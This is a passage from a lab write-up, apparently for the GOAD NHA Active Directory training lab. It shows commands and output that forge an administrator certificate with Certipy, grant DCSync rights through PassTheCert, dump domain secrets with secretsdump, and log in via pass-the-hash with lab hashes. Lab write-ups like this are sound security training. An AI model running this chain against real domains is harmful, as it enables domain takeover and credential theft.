[*] Got hash for 'administrator@ninja.hack': aad3b435b51404eeaad3b435b51404ee:6<redacted>3

.

for trouble shooting certipy make sure you are using 5.0.4 version
the sid maybe changed
if You faced error restart the lab


Next we can use these command to grant DCSync privileges to rachel.philips and dump secrets of the ninja.hack domain.

certipy cert -pfx “administrator.pfx” -nokey -out “user.crt”

certipy cert -pfx “administrator.pfx” -nocert -out “user.key”

 python3 passthecert.py -action modify_user -crt “user.crt” -key “user.key” -domain “ninja.hack” -dc-ip 192.168.56.10 -target “rachel.philips” -elevate

we use : https://github.com/AlmondOffSec/PassTheCert/tree/main for PassTheCert.py

$ certipy req -u 'rachel.philips@ninja.hack' -p 'Password123@' -ca 'NINJA-CA' -template 'SignatureValidation' -upn 'Administrator@ninja.hack' -target-ip '192.168.56.10' -sid 'S-1-5-21-1377167689-3644946187-504094176-500'
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 6
[*] Successfully requested certificate
[*] Got certificate with UPN 'Administrator@ninja.hack'
[*] Certificate object SID is 'S-1-5-21-1377167689-3644946187-504094176-500'
[*] Wrote certificate and private key to 'administrator.pfx'

$ certipy cert -pfx "administrator.pfx" -nokey -out "user.crt"
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Data written to 'user.crt'
[*] Writing certificate to 'user.crt'

$ certipy cert -pfx "administrator.pfx" -nocert -out "user.key"
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Data written to 'user.key'
[*] Writing private key to 'user.key'

$ python3 passthecert.py -action modify_user -crt "user.crt" -key "user.key" -domain "ninja.hack" -dc-ip 192.168.56.10 -target "rachel.philips" -elevate
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Granted user 'rachel.philips' DCSYNC rights!

.

find the gold: impacket-secretsdump -just-dc ninja.hack/rachel.philips:’Password123@’@ninja.hack

use: evil-winrm -i 192.168.56.10 -u “alice.johnson” -H “c689c7d8bec0df70927c3574040e827b”

or: nxc smb dc-vil.ninja.hack -u ‘alice.johnson’ -H ‘c689c7d8bec0df70927c3574040e827b’ –generate-tgt alice_tgt

   : export KRB5CCNAME=alice_tgt.ccache

   : evil-winrm -i dc-vil.ninja.hack -r NINJA.HACK

.


Special Thanks

Thanks too : NHA Lab Write-Up — From Web to Domain Admin (Twice) | by Law | Medium

and Big thanks to the Mayfly who made this lab — it was super fun and helpful.
If you want to try it, here’s the link:
https://orange-cyberdefense.github.io/GOAD/labs/NHA/